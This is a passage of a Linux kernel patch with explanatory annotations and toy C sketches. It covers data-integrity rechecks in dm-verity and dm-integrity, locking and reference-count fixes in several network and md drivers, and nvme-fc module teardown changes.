++			memcpy(mem + pos, buffer, ic->sectors_per_block << SECTOR_SHIFT);
++			kunmap_local(mem);
++
++			pos += ic->sectors_per_block << SECTOR_SHIFT;
++			sector += ic->sectors_per_block;
++			logical_sector += ic->sectors_per_block;
++		} while (pos < bv.bv_len);
++	}
++free_ret:
++	mempool_free(page, &ic->recheck_pool);
++}
++
+ static void integrity_metadata(struct work_struct *w)
+ {
+ 	struct dm_integrity_io *dio = container_of(w, struct dm_integrity_io, work);
+@@ -1784,15 +1857,8 @@ static void integrity_metadata(struct work_struct *w)
+ 						checksums_ptr - checksums, dio->op == REQ_OP_READ ? TAG_CMP : TAG_WRITE);
+ 			if (unlikely(r)) {
+ 				if (r > 0) {
+-					sector_t s;
+-
+-					s = sector - ((r + ic->tag_size - 1) / ic->tag_size);
+-					DMERR_LIMIT("%pg: Checksum failed at sector 0x%llx",
+-						    bio->bi_bdev, s);
+-					r = -EILSEQ;
+-					atomic64_inc(&ic->number_of_mismatches);
+-					dm_audit_log_bio(DM_MSG_PREFIX, "integrity-checksum",
+-							 bio, s, 0);
++					integrity_recheck(dio, checksums);
++					goto skip_io;
+ 				}
+ 				if (likely(checksums != checksums_onstack))
+ 					kfree(checksums);
+@@ -4208,6 +4274,12 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 		goto bad;
+ 	}
+ 
++	r = mempool_init_page_pool(&ic->recheck_pool, 1, 0);
++	if (r) {
++		ti->error = "Cannot allocate mempool";
++		goto bad;
++	}
++
+ 	ic->metadata_wq = alloc_workqueue("dm-integrity-metadata",
+ 					  WQ_MEM_RECLAIM, METADATA_WORKQUEUE_MAX_ACTIVE);
+ 	if (!ic->metadata_wq) {
+@@ -4572,6 +4644,7 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	kvfree(ic->bbs);
+ 	if (ic->bufio)
+ 		dm_bufio_client_destroy(ic->bufio);
++	mempool_exit(&ic->recheck_pool);
+ 	mempool_exit(&ic->journal_io_mempool);
+ 	if (ic->io)
+ 		dm_io_client_destroy(ic->io);
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 4669923f4cfb4..b48e1b59e6da4 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -474,6 +474,63 @@ int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 	return 0;
+ }
+ 
++static int verity_recheck_copy(struct dm_verity *v, struct dm_verity_io *io,
++			       u8 *data, size_t len)
++{
++	memcpy(data, io->recheck_buffer, len);
++	io->recheck_buffer += len;
++
++	return 0;
++}
++
++static noinline int verity_recheck(struct dm_verity *v, struct dm_verity_io *io,
++				   struct bvec_iter start, sector_t cur_block)
++{
++	struct page *page;
++	void *buffer;
++	int r;
++	struct dm_io_request io_req;
++	struct dm_io_region io_loc;
++
++	page = mempool_alloc(&v->recheck_pool, GFP_NOIO);
++	buffer = page_to_virt(page);
++
++	io_req.bi_opf = REQ_OP_READ;
++	io_req.mem.type = DM_IO_KMEM;
++	io_req.mem.ptr.addr = buffer;
++	io_req.notify.fn = NULL;
++	io_req.client = v->io;
++	io_loc.bdev = v->data_dev->bdev;
++	io_loc.sector = cur_block << (v->data_dev_block_bits - SECTOR_SHIFT);
++	io_loc.count = 1 << (v->data_dev_block_bits - SECTOR_SHIFT);
++	r = dm_io(&io_req, 1, &io_loc, NULL);
++	if (unlikely(r))
++		goto free_ret;
++
++	r = verity_hash(v, verity_io_hash_req(v, io), buffer,
++			1 << v->data_dev_block_bits,
++			verity_io_real_digest(v, io), true);
++	if (unlikely(r))
++		goto free_ret;
++
++	if (memcmp(verity_io_real_digest(v, io),
++		   verity_io_want_digest(v, io), v->digest_size)) {
++		r = -EIO;
++		goto free_ret;
++	}
++
++	io->recheck_buffer = buffer;
++	r = verity_for_bv_block(v, io, &start, verity_recheck_copy);
++	if (unlikely(r))
++		goto free_ret;
++
++	r = 0;
++free_ret:
++	mempool_free(page, &v->recheck_pool);
++
++	return r;
++}
++
+ static int verity_bv_zero(struct dm_verity *v, struct dm_verity_io *io,
+ 			  u8 *data, size_t len)
+ {
+@@ -500,9 +557,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ {
+ 	bool is_zero;
+ 	struct dm_verity *v = io->v;
+-#if defined(CONFIG_DM_VERITY_FEC)
+ 	struct bvec_iter start;
+-#endif
+ 	struct bvec_iter iter_copy;
+ 	struct bvec_iter *iter;
+ 	struct crypto_wait wait;
+@@ -553,10 +608,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 		if (unlikely(r < 0))
+ 			return r;
+ 
+-#if defined(CONFIG_DM_VERITY_FEC)
+-		if (verity_fec_is_enabled(v))
+-			start = *iter;
+-#endif
++		start = *iter;
+ 		r = verity_for_io_block(v, io, iter, &wait);
+ 		if (unlikely(r < 0))
+ 			return r;
+@@ -578,6 +630,10 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 			 * tasklet since it may sleep, so fallback to work-queue.
+ 			 */
+ 			return -EAGAIN;
++		} else if (verity_recheck(v, io, start, cur_block) == 0) {
++			if (v->validated_blocks)
++				set_bit(cur_block, v->validated_blocks);
++			continue;
+ #if defined(CONFIG_DM_VERITY_FEC)
+ 		} else if (verity_fec_decode(v, io, DM_VERITY_BLOCK_TYPE_DATA,
+ 					     cur_block, NULL, &start) == 0) {
+@@ -928,6 +984,10 @@ static void verity_dtr(struct dm_target *ti)
+ 	if (v->verify_wq)
+ 		destroy_workqueue(v->verify_wq);
+ 
++	mempool_exit(&v->recheck_pool);
++	if (v->io)
++		dm_io_client_destroy(v->io);
++
+ 	if (v->bufio)
+ 		dm_bufio_client_destroy(v->bufio);
+ 
+@@ -1364,6 +1424,20 @@ static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	}
+ 	v->hash_blocks = hash_position;
+ 
++	r = mempool_init_page_pool(&v->recheck_pool, 1, 0);
++	if (unlikely(r)) {
++		ti->error = "Cannot allocate mempool";
++		goto bad;
++	}
++
++	v->io = dm_io_client_create();
++	if (IS_ERR(v->io)) {
++		r = PTR_ERR(v->io);
++		v->io = NULL;
++		ti->error = "Cannot allocate dm io";
++		goto bad;
++	}
++
+ 	v->bufio = dm_bufio_client_create(v->hash_dev->bdev,
+ 		1 << v->hash_dev_block_bits, 1, sizeof(struct buffer_aux),
+ 		dm_bufio_alloc_callback, NULL,
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index f3f6070084196..4620a98c99561 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -11,6 +11,7 @@
+ #ifndef DM_VERITY_H
+ #define DM_VERITY_H
+ 
++#include <linux/dm-io.h>
+ #include <linux/dm-bufio.h>
+ #include <linux/device-mapper.h>
+ #include <linux/interrupt.h>
+@@ -68,6 +69,9 @@ struct dm_verity {
+ 	unsigned long *validated_blocks; /* bitset blocks validated */
+ 
+ 	char *signature_key_desc; /* signature keyring reference */
++
++	struct dm_io_client *io;
++	mempool_t recheck_pool;
+ };
+ 
+ struct dm_verity_io {
+@@ -84,6 +88,8 @@ struct dm_verity_io {
+ 
+ 	struct work_struct work;
+ 
++	char *recheck_buffer;
++
+ 	/*
+ 	 * Three variably-size fields follow this struct:
+ 	 *
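
The dm-verity and dm-integrity hunks above add the same recheck mechanism: when a block's digest does not match, the block is re-read synchronously into a private mempool-backed buffer and verified again, so a write racing with the original read is not misreported as corruption; only a persistent mismatch is an error. A toy sketch of the recheck logic (the digest and the I/O helper are stand-ins, not the real primitives):

#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* toy digest standing in for the real hash */
static uint32_t digest(const uint8_t *buf, size_t len)
{
	uint32_t d = 0;

	while (len--)
		d = d * 31 + *buf++;
	return d;
}

/* pretend synchronous re-read from stable storage */
static void read_block_sync(uint8_t *dst, const uint8_t *disk, size_t len)
{
	memcpy(dst, disk, len);
}

static int verify_block(const uint8_t *data, size_t len, uint32_t want,
			const uint8_t *disk)
{
	uint8_t fresh[16];

	if (digest(data, len) == want)
		return 0;
	/* mismatch: re-read into a private buffer and recheck, so a
	 * writer racing with the first read is not reported as corruption */
	read_block_sync(fresh, disk, len);
	if (digest(fresh, len) == want)
		return 0;	/* transient: the first read raced */
	return -1;		/* persistent: genuine mismatch */
}

int main(void)
{
	uint8_t disk[16] = "stable contents";
	uint8_t racy[16] = "torn contentsXX";	/* what the first read saw */
	uint32_t want = digest(disk, sizeof(disk));

	printf("recheck verdict: %d\n",
	       verify_block(racy, sizeof(racy), want, disk));	/* 0 */
	return 0;
}
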
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index c7efe15229514..846bdee4daa0e 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -564,8 +564,12 @@ static void submit_flushes(struct work_struct *ws)
+ 			rcu_read_lock();
+ 		}
+ 	rcu_read_unlock();
+-	if (atomic_dec_and_test(&mddev->flush_pending))
++	if (atomic_dec_and_test(&mddev->flush_pending)) {
++		/* The pair is percpu_ref_get() from md_flush_request() */
++		percpu_ref_put(&mddev->active_io);
++
+ 		queue_work(md_wq, &mddev->flush_work);
++	}
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws)
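
The md hunk restores reference symmetry: md_flush_request() takes a percpu_ref get on active_io, and the put now happens when the last outstanding per-device flush completes. Approximating percpu_ref with a plain atomic counter, the pairing looks roughly like this (names invented; completions would normally run asynchronously):

#include <stdatomic.h>
#include <stdio.h>

static atomic_int active_io = 1;	/* object lifetime reference count */
static atomic_int flush_pending;

static void md_flush_request_sketch(int ndevices)
{
	int i;

	atomic_fetch_add(&active_io, 1);	/* get: one per flush request */
	atomic_fetch_add(&flush_pending, 1);	/* bias held while submitting */
	for (i = 0; i < ndevices; i++)
		atomic_fetch_add(&flush_pending, 1);
	/* the submitter drops its bias via the same completion path */
}

static void flush_completed(void)
{
	if (atomic_fetch_sub(&flush_pending, 1) == 1) {
		/* last completion: pairs with the get taken at submission */
		atomic_fetch_sub(&active_io, 1);
		printf("flush done, reference released\n");
	}
}

int main(void)
{
	md_flush_request_sketch(3);
	flush_completed();	/* device 0 */
	flush_completed();	/* device 1 */
	flush_completed();	/* device 2 */
	flush_completed();	/* drops the submission bias */
	printf("active_io = %d\n", atomic_load(&active_io));	/* back to 1 */
	return 0;
}
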
+diff --git a/drivers/misc/open-dice.c b/drivers/misc/open-dice.c
+index c61be3404c6f2..504b836a7abf8 100644
+--- a/drivers/misc/open-dice.c
++++ b/drivers/misc/open-dice.c
+@@ -142,7 +142,6 @@ static int __init open_dice_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	*drvdata = (struct open_dice_drvdata){
+-		.lock = __MUTEX_INITIALIZER(drvdata->lock),
+ 		.rmem = rmem,
+ 		.misc = (struct miscdevice){
+ 			.parent	= dev,
+@@ -152,6 +151,7 @@ static int __init open_dice_probe(struct platform_device *pdev)
+ 			.mode	= 0600,
+ 		},
+ 	};
++	mutex_init(&drvdata->lock);
+ 
+ 	/* Index overflow check not needed, misc_register() will fail. */
+ 	snprintf(drvdata->name, sizeof(drvdata->name), DRIVER_NAME"%u", dev_idx++);
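
The open-dice fix moves the lock out of the compound-literal assignment and initializes it afterwards with mutex_init(); dynamically allocated kernel locks want the runtime initializer (lockdep included), and a whole-struct assignment that references one of its own fields mid-initialization is fragile. A userspace analog with pthreads, assuming only POSIX:

#include <pthread.h>
#include <stdlib.h>

struct drvdata {
	pthread_mutex_t lock;
	int value;
};

static struct drvdata *drvdata_create(void)
{
	struct drvdata *d = malloc(sizeof(*d));

	if (!d)
		return NULL;
	/* assign the plain fields first... */
	*d = (struct drvdata){ .value = 42 };
	/* ...then give the lock its runtime initialization, so the
	 * whole-struct assignment cannot clobber or bypass it */
	pthread_mutex_init(&d->lock, NULL);
	return d;
}

int main(void)
{
	struct drvdata *d = drvdata_create();

	if (!d)
		return 1;
	pthread_mutex_lock(&d->lock);
	d->value++;
	pthread_mutex_unlock(&d->lock);
	pthread_mutex_destroy(&d->lock);
	free(d);
	return 0;
}
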
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 3784347b6fd88..55639c133dd02 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -437,6 +437,10 @@ static void npc_fixup_vf_rule(struct rvu *rvu, struct npc_mcam *mcam,
+ 			return;
+ 	}
+ 
++	/* AF modifies the given action iff the PF/VF has requested it */
++	if ((entry->action & 0xFULL) != NIX_RX_ACTION_DEFAULT)
++		return;
++
+ 	/* copy VF default entry action to the VF mcam entry */
+ 	rx_action = npc_get_default_entry_action(rvu, mcam, blkaddr,
+ 						 target_func);
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+index 3423c95cc84ae..7031f41287e09 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+@@ -744,6 +744,7 @@ static int mchp_sparx5_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, sparx5);
+ 	sparx5->pdev = pdev;
+ 	sparx5->dev = &pdev->dev;
++	spin_lock_init(&sparx5->tx_lock);
+ 
+ 	/* Do switch core reset if available */
+ 	reset = devm_reset_control_get_optional_shared(&pdev->dev, "switch");
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_main.h b/drivers/net/ethernet/microchip/sparx5/sparx5_main.h
+index 7a83222caa737..cb3173d2b0e8d 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_main.h
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_main.h
+@@ -278,6 +278,7 @@ struct sparx5 {
+ 	int xtr_irq;
+ 	/* Frame DMA */
+ 	int fdma_irq;
++	spinlock_t tx_lock; /* lock for frame transmission */
+ 	struct sparx5_rx rx;
+ 	struct sparx5_tx tx;
+ 	/* PTP */
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c b/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c
+index 6db6ac6a3bbc2..ac7e1cffbcecf 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c
+@@ -244,10 +244,12 @@ netdev_tx_t sparx5_port_xmit_impl(struct sk_buff *skb, struct net_device *dev)
+ 	}
+ 
+ 	skb_tx_timestamp(skb);
++	spin_lock(&sparx5->tx_lock);
+ 	if (sparx5->fdma_irq > 0)
+ 		ret = sparx5_fdma_xmit(sparx5, ifh, skb);
+ 	else
+ 		ret = sparx5_inject(sparx5, ifh, skb, dev);
++	spin_unlock(&sparx5->tx_lock);
+ 
+ 	if (ret == -EBUSY)
+ 		goto busy;
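
The sparx5 hunks serialize the two alternative transmit paths, FDMA and register injection, behind one tx_lock, since both manipulate shared TX state. The rule, sketched with a pthread mutex and invented names:

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t tx_lock = PTHREAD_MUTEX_INITIALIZER;
static int tx_ring_head;	/* shared TX state both paths touch */

static void xmit_fdma(void)   { tx_ring_head++; }
static void xmit_inject(void) { tx_ring_head++; }

static void port_xmit(int have_fdma)
{
	/* both paths update tx_ring_head, so both take the same lock */
	pthread_mutex_lock(&tx_lock);
	if (have_fdma)
		xmit_fdma();
	else
		xmit_inject();
	pthread_mutex_unlock(&tx_lock);
}

int main(void)
{
	port_xmit(1);
	port_xmit(0);
	printf("head = %d\n", tx_ring_head);
	return 0;
}
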
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 66178ce6d000e..91b2aa81914ba 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -5823,11 +5823,6 @@ static irqreturn_t stmmac_mac_interrupt(int irq, void *dev_id)
+ 	struct net_device *dev = (struct net_device *)dev_id;
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+ 
+-	if (unlikely(!dev)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+@@ -5843,11 +5838,6 @@ static irqreturn_t stmmac_safety_interrupt(int irq, void *dev_id)
+ 	struct net_device *dev = (struct net_device *)dev_id;
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+ 
+-	if (unlikely(!dev)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+@@ -5869,11 +5859,6 @@ static irqreturn_t stmmac_msi_intr_tx(int irq, void *data)
+ 	dma_conf = container_of(tx_q, struct stmmac_dma_conf, tx_queue[chan]);
+ 	priv = container_of(dma_conf, struct stmmac_priv, dma_conf);
+ 
+-	if (unlikely(!data)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+@@ -5900,11 +5885,6 @@ static irqreturn_t stmmac_msi_intr_rx(int irq, void *data)
+ 	dma_conf = container_of(rx_q, struct stmmac_dma_conf, rx_queue[chan]);
+ 	priv = container_of(dma_conf, struct stmmac_priv, dma_conf);
+ 
+-	if (unlikely(!data)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index bace989591f75..937dd9cf4fbaf 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1906,20 +1906,20 @@ static int __init gtp_init(void)
+ 	if (err < 0)
+ 		goto error_out;
+ 
+-	err = genl_register_family(&gtp_genl_family);
++	err = register_pernet_subsys(&gtp_net_ops);
+ 	if (err < 0)
+ 		goto unreg_rtnl_link;
+ 
+-	err = register_pernet_subsys(&gtp_net_ops);
++	err = genl_register_family(&gtp_genl_family);
+ 	if (err < 0)
+-		goto unreg_genl_family;
++		goto unreg_pernet_subsys;
+ 
+ 	pr_info("GTP module loaded (pdp ctx size %zd bytes)\n",
+ 		sizeof(struct pdp_ctx));
+ 	return 0;
+ 
+-unreg_genl_family:
+-	genl_unregister_family(&gtp_genl_family);
++unreg_pernet_subsys:
++	unregister_pernet_subsys(&gtp_net_ops);
+ unreg_rtnl_link:
+ 	rtnl_link_unregister(&gtp_link_ops);
+ error_out:
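
The gtp fix registers the pernet subsystem before the generic netlink family, because netlink requests can arrive as soon as the family is registered and they expect the per-net state to exist; the error labels then unwind in exact reverse order. A sketch of the register-in-dependency-order, unwind-in-reverse pattern (subsystems a and b are hypothetical):

#include <stdio.h>

static int a_registered, b_registered;

static int register_a(void) { a_registered = 1; return 0; }
static void unregister_a(void) { a_registered = 0; }
/* b's callbacks may fire immediately and depend on a being up */
static int register_b(void) { b_registered = 1; return a_registered ? 0 : -1; }
static void unregister_b(void) { b_registered = 0; }

static int module_init_sketch(void)
{
	int err;

	err = register_a();		/* dependency first */
	if (err)
		goto out;
	err = register_b();		/* user of the dependency second */
	if (err)
		goto unreg_a;		/* unwind in reverse order */
	return 0;

unreg_a:
	unregister_a();
out:
	return err;
}

int main(void)
{
	return module_init_sketch() ? 1 : 0;
}
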
+diff --git a/drivers/net/phy/realtek.c b/drivers/net/phy/realtek.c
+index 3d99fd6664d7a..70e52d27064ec 100644
+--- a/drivers/net/phy/realtek.c
++++ b/drivers/net/phy/realtek.c
+@@ -414,9 +414,11 @@ static int rtl8211f_config_init(struct phy_device *phydev)
+ 				ERR_PTR(ret));
+ 			return ret;
+ 		}
++
++		return genphy_soft_reset(phydev);
+ 	}
+ 
+-	return genphy_soft_reset(phydev);
++	return 0;
+ }
+ 
+ static int rtl821x_resume(struct phy_device *phydev)
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 177a365b8ec55..3dbf926fd99fd 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -221,11 +221,6 @@ static LIST_HEAD(nvme_fc_lport_list);
+ static DEFINE_IDA(nvme_fc_local_port_cnt);
+ static DEFINE_IDA(nvme_fc_ctrl_cnt);
+ 
+-static struct workqueue_struct *nvme_fc_wq;
+-
+-static bool nvme_fc_waiting_to_unload;
+-static DECLARE_COMPLETION(nvme_fc_unload_proceed);
+-
+ /*
+  * These items are short-term. They will eventually be moved into
+  * a generic FC class. See comments in module init.
+@@ -255,8 +250,6 @@ nvme_fc_free_lport(struct kref *ref)
+ 	/* remove from transport list */
+ 	spin_lock_irqsave(&nvme_fc_lock, flags);
+ 	list_del(&lport->port_list);
+-	if (nvme_fc_waiting_to_unload && list_empty(&nvme_fc_lport_list))
+-		complete(&nvme_fc_unload_proceed);
+ 	spin_unlock_irqrestore(&nvme_fc_lock, flags);
+ 
+ 	ida_free(&nvme_fc_local_port_cnt, lport->localport.port_num);
+@@ -3869,10 +3862,6 @@ static int __init nvme_fc_init_module(void)
+ {
+ 	int ret;
+ 
+-	nvme_fc_wq = alloc_workqueue("nvme_fc_wq", WQ_MEM_RECLAIM, 0);
+-	if (!nvme_fc_wq)
+-		return -ENOMEM;
+-
+ 	/*
+ 	 * NOTE:
+ 	 * It is expected that in the future the kernel will combine
+@@ -3890,7 +3879,7 @@ static int __init nvme_fc_init_module(void)
+ 	ret = class_register(&fc_class);
+ 	if (ret) {
+ 		pr_err("couldn't register class fc\n");
+-		goto out_destroy_wq;
++		return ret;
+ 	}
+ 
+ 	/*
+@@ -3914,8 +3903,6 @@ static int __init nvme_fc_init_module(void)
+ 	device_destroy(&fc_class, MKDEV(0, 0));
+ out_destroy_class:
+ 	class_unregister(&fc_class);
+-out_destroy_wq:
+-	destroy_workqueue(nvme_fc_wq);
+ 
+ 	return ret;
+ }
+@@ -3935,45 +3922,23 @@ nvme_fc_delete_controllers(struct nvme_fc_rport *rport)
+ 	spin_unlock(&rport->lock);
+ }
+ 
+-static void
+-nvme_fc_cleanup_for_unload(void)
++static void __exit nvme_fc_exit_module(void)
+ {
+ 	struct nvme_fc_lport *lport;
+ 	struct nvme_fc_rport *rport;
+-
+-	list_for_each_entry(lport, &nvme_fc_lport_list, port_list) {
+-		list_for_each_entry(rport, &lport->endp_list, endp_list) {
+-			nvme_fc_delete_controllers(rport);
+-		}
+-	}
+-}
+-
+-static void __exit nvme_fc_exit_module(void)
+-{
+ 	unsigned long flags;
+-	bool need_cleanup = false;
+ 
+ 	spin_lock_irqsave(&nvme_fc_lock, flags);
+-	nvme_fc_waiting_to_unload = true;
+-	if (!list_empty(&nvme_fc_lport_list)) {
+-		need_cleanup = true;
+-		nvme_fc_cleanup_for_unload();
+-	}
++	list_for_each_entry(lport, &nvme_fc_lport_list, port_list)
++		list_for_each_entry(rport, &lport->endp_list, endp_list)
++			nvme_fc_delete_controllers(rport);
+ 	spin_unlock_irqrestore(&nvme_fc_lock, flags);
+-	if (need_cleanup) {
+-		pr_info("%s: waiting for ctlr deletes\n", __func__);
+-		wait_for_completion(&nvme_fc_unload_proceed);
+-		pr_info("%s: ctrl deletes complete\n", __func__);
+-	}
++	flush_workqueue(nvme_delete_wq);
+ 
+ 	nvmf_unregister_transport(&nvme_fc_transport);
+ 
+-	ida_destroy(&nvme_fc_local_port_cnt);
+-	ida_destroy(&nvme_fc_ctrl_cnt);
+-
+ 	device_destroy(&fc_class, MKDEV(0, 0));
+ 	class_unregister(&fc_class);
+-	destroy_workqueue(nvme_fc_wq);
+ }
+ 
+ module_init(nvme_fc_init_module);
+diff --git a/drivers/nvme/target/fc.c b/drivers/nvme/target/fc.c
+index 1ab6601fdd5cf..8a02ed63b1566 100644
+--- a/drivers/nvme/target/fc.c
++++ b/drivers/nvme/target/fc.c
+@@ -111,6 +111,8 @@ struct nvmet_fc_tgtport {
+ 	struct nvmet_fc_port_entry	*pe;
+ 	struct kref			ref;
+ 	u32				max_sg_cnt;
++
++	struct work_struct		put_work;
+ };
+ 
+ struct nvmet_fc_port_entry {
+@@ -165,7 +167,7 @@ struct nvmet_fc_tgt_assoc {
+ 	struct nvmet_fc_hostport	*hostport;
+ 	struct nvmet_fc_ls_iod		*rcv_disconn;
+ 	struct list_head		a_list;
+-	struct nvmet_fc_tgt_queue __rcu	*queues[NVMET_NR_QUEUES + 1];
++	struct nvmet_fc_tgt_queue 	*queues[NVMET_NR_QUEUES + 1];
+ 	struct kref			ref;
+ 	struct work_struct		del_work;
+ 	struct rcu_head			rcu;
+@@ -248,6 +250,13 @@ static int nvmet_fc_tgt_a_get(struct nvmet_fc_tgt_assoc *assoc);
+ static void nvmet_fc_tgt_q_put(struct nvmet_fc_tgt_queue *queue);
+ static int nvmet_fc_tgt_q_get(struct nvmet_fc_tgt_queue *queue);
+ static void nvmet_fc_tgtport_put(struct nvmet_fc_tgtport *tgtport);
++static void nvmet_fc_put_tgtport_work(struct work_struct *work)
++{
++	struct nvmet_fc_tgtport *tgtport =
++		container_of(work, struct nvmet_fc_tgtport, put_work);
++
++	nvmet_fc_tgtport_put(tgtport);
++}
+ static int nvmet_fc_tgtport_get(struct nvmet_fc_tgtport *tgtport);
+ static void nvmet_fc_handle_fcp_rqst(struct nvmet_fc_tgtport *tgtport,
+ 					struct nvmet_fc_fcp_iod *fod);
+@@ -359,7 +368,7 @@ __nvmet_fc_finish_ls_req(struct nvmet_fc_ls_req_op *lsop)
+ 
+ 	if (!lsop->req_queued) {
+ 		spin_unlock_irqrestore(&tgtport->lock, flags);
+-		return;
++		goto out_putwork;
+ 	}
+ 
+ 	list_del(&lsop->lsreq_list);
+@@ -372,7 +381,8 @@ __nvmet_fc_finish_ls_req(struct nvmet_fc_ls_req_op *lsop)
+ 				  (lsreq->rqstlen + lsreq->rsplen),
+ 				  DMA_BIDIRECTIONAL);
+ 
+-	nvmet_fc_tgtport_put(tgtport);
++out_putwork:
++	queue_work(nvmet_wq, &tgtport->put_work);
+ }
+ 
+ static int
+@@ -801,14 +811,11 @@ nvmet_fc_alloc_target_queue(struct nvmet_fc_tgt_assoc *assoc,
+ 	if (!queue)
+ 		return NULL;
+ 
+-	if (!nvmet_fc_tgt_a_get(assoc))
+-		goto out_free_queue;
+-
+ 	queue->work_q = alloc_workqueue("ntfc%d.%d.%d", 0, 0,
+ 				assoc->tgtport->fc_target_port.port_num,
+ 				assoc->a_id, qid);
+ 	if (!queue->work_q)
+-		goto out_a_put;
++		goto out_free_queue;
+ 
+ 	queue->qid = qid;
+ 	queue->sqsize = sqsize;
+@@ -830,15 +837,13 @@ nvmet_fc_alloc_target_queue(struct nvmet_fc_tgt_assoc *assoc,
+ 		goto out_fail_iodlist;
+ 
+ 	WARN_ON(assoc->queues[qid]);
+-	rcu_assign_pointer(assoc->queues[qid], queue);
++	assoc->queues[qid] = queue;
+ 
+ 	return queue;
+ 
+ out_fail_iodlist:
+ 	nvmet_fc_destroy_fcp_iodlist(assoc->tgtport, queue);
+ 	destroy_workqueue(queue->work_q);
+-out_a_put:
+-	nvmet_fc_tgt_a_put(assoc);
+ out_free_queue:
+ 	kfree(queue);
+ 	return NULL;
+@@ -851,12 +856,8 @@ nvmet_fc_tgt_queue_free(struct kref *ref)
+ 	struct nvmet_fc_tgt_queue *queue =
+ 		container_of(ref, struct nvmet_fc_tgt_queue, ref);
+ 
+-	rcu_assign_pointer(queue->assoc->queues[queue->qid], NULL);
+-
+ 	nvmet_fc_destroy_fcp_iodlist(queue->assoc->tgtport, queue);
+ 
+-	nvmet_fc_tgt_a_put(queue->assoc);
+-
+ 	destroy_workqueue(queue->work_q);
+ 
+ 	kfree_rcu(queue, rcu);
+@@ -968,7 +969,7 @@ nvmet_fc_find_target_queue(struct nvmet_fc_tgtport *tgtport,
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(assoc, &tgtport->assoc_list, a_list) {
+ 		if (association_id == assoc->association_id) {
+-			queue = rcu_dereference(assoc->queues[qid]);
++			queue = assoc->queues[qid];
+ 			if (queue &&
+ 			    (!atomic_read(&queue->connected) ||
+ 			     !nvmet_fc_tgt_q_get(queue)))
+@@ -1077,8 +1078,6 @@ nvmet_fc_alloc_hostport(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ 		/* new allocation not needed */
+ 		kfree(newhost);
+ 		newhost = match;
+-		/* no new allocation - release reference */
+-		nvmet_fc_tgtport_put(tgtport);
+ 	} else {
+ 		newhost->tgtport = tgtport;
+ 		newhost->hosthandle = hosthandle;
+@@ -1093,13 +1092,28 @@ nvmet_fc_alloc_hostport(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ }
+ 
+ static void
+-nvmet_fc_delete_assoc(struct work_struct *work)
++nvmet_fc_delete_assoc(struct nvmet_fc_tgt_assoc *assoc)
++{
++	nvmet_fc_delete_target_assoc(assoc);
++	nvmet_fc_tgt_a_put(assoc);
++}
++
++static void
++nvmet_fc_delete_assoc_work(struct work_struct *work)
+ {
+ 	struct nvmet_fc_tgt_assoc *assoc =
+ 		container_of(work, struct nvmet_fc_tgt_assoc, del_work);
++	struct nvmet_fc_tgtport *tgtport = assoc->tgtport;
